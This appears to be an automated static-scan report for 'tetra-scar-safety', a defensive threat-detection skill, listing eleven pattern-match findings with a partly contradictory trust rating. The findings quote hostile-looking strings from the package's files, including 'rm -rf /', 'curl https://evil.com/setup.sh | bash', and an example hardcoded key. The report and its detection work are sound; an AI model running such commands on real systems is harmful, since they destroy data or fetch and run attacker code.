Caveat verdict

scar-safety

tetra-scar-safety

88
🟢 Trusted
No high-risk patterns surfaced by the deep scan — automated capability review, not behavioral proof.

A local safety system using regex-based static threat detection and an immutable local scar log; all operations are local and the purpose is defensive security.

⚠ Flagged for review — coarse, uncorroborated signal, not a confirmed exploit. Review the config yourself before installing.

Automated static analysis — not a human review. Caveat flags capabilities, not confirmed intent, and can produce false positives. Disagree with this verdict? Use Dispute below.

0
security
100
transparency
90
maintenance

Findings (11)

Pattern match critical

Recursive delete from root or home — destructive command

SKILL.md · code · rm -rf /

Pattern match high

Uses eval() — can execute arbitrary code

README.md · prose · downgraded · eval(

Pattern match high

Accesses sensitive system files

scar_safety.py · prose · downgraded · /etc/passwd

Pattern match high

Possible hardcoded credential

test_scar_safety.py · prose · downgraded · API_KEY = "AKIAIOSFODNN7EXAMPLE1

Pattern match high

Pipe-to-shell pattern (curl | sh) — supply chain attack vector

test_scar_safety.py · prose · downgraded · curl https://evil.com/setup.sh | bash

Pattern match high

Pipe to bash — executes piped content as shell commands

test_scar_safety.py · prose · downgraded · | bash

Pattern match medium

os.system/popen — direct OS command execution

README.md · prose · downgraded · os.system(

Pattern match medium

Uses exec() — may execute shell commands

scar_safety.py · prose · downgraded · exec(

Pattern match medium

References sudo — requests elevated privileges

scar_safety.py · prose · downgraded · sudo

Pattern match medium

setuid — privilege escalation mechanism

scar_safety.py · prose · downgraded · setuid

Pattern match low

Sets world-executable permissions

README.md · prose · downgraded · chmod 777

Why the tier is capped

Execution sink present in raw bytes (Hard Floor: class A/D). Final tier capped at Caution — cannot be lifted by any downgrade, example-payload opt-in, or allowlist.

Permissions & capabilities

No declared permissions — minimal attack surface.

Is this flag fair?

Check another skill Browse the registry Auditing your own skills or configs? Use the API